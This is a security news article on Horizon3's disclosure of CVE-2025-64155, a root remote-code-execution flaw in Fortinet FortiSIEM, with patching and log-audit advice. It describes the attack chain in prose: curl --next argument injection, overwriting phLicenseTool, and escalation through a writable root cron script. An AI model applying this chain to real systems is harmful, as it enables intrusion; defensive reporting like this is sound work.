Guarding the Guardian: Horizon3 Unmasks Root RCE in Fortinet FortiSIEM

Security researchers at Horizon3 have disseminated a meticulous deconstruction of a burgeoning critical vulnerability within Fortinet FortiSIEM—a widely utilized Security Information and Event Management (SIEM) solution employed by global organizations to oversee their infrastructure.

The vulnerability, designated as CVE-2025-64155, empowers an unauthenticated adversary to execute arbitrary code remotely on a FortiSIEM server, culminating in full root-level administrative privileges. Paradoxically, this allows for the total subversion of a system specifically engineered to safeguard the corporate perimeter.

The genesis of this discovery dates back to August 2025, when Fortinet issued a remediation for a separate flaw within the same product. Analysts at Horizon3 sought to evaluate the efficacy of this patch, subsequently uncovering a novel attack vector. Notably, this represents the third significant security failure identified within the phMonitor service—the component responsible for inter-module communication—following analogous issues in 2023 and 2024.

Technically, the vulnerability resides in how the phMonitor service manages incoming requests and delegates them to various handlers without validating the sender’s identity. Although developers had previously implemented defenses against command injection by encapsulating user data in single quotes, researchers identified a sophisticated bypass utilizing argument injection via the curl utility.

The linchpin of the assault is an obscure curl option known as --next, which permits the amalgamation of multiple requests into a singular command execution. By exploiting this nuance, an attacker can write arbitrary files to any directory on the server with administrative privileges. The researchers successfully utilized this to overwrite phLicenseTool—a file executed by the system at brief, regular intervals—thereby achieving initial code execution.

To escalate their privileges to the root level, the team scrutinized the cron task scheduler, discovering that the redishb.sh script is executed with root authority every minute, yet remains writable by the standard administrative user. Overwriting this script facilitated an unhindered ascent to total system dominion.

The gravity of this situation is underscored by leaked communications from the Black Basta ransomware collective in early 2025, which revealed a focused interest in FortiSIEM vulnerabilities. Such evidence confirms that flaws in defensive software are highly coveted by sophisticated cybercriminal entities.

The disclosure process proved protracted. Horizon3 initially alerted Fortinet to the vulnerability on August 14, 2025. Following the standard 90-day window for coordinated disclosure, four of the five product branches were remediated; however, one remained susceptible. Consequently, the formal public disclosure was deferred until January 13, 2026—151 days after the initial notification.

System administrators managing FortiSIEM installations are strongly exhorted to deploy the latest security updates immediately. To identify potential indicators of compromise, one should audit the phoenix.logs for PHL_ERROR entries containing suspicious URLs or anomalous file paths. The availability of a Proof-of-Concept (PoC) exploit on GitHub renders the urgency of these updates paramount.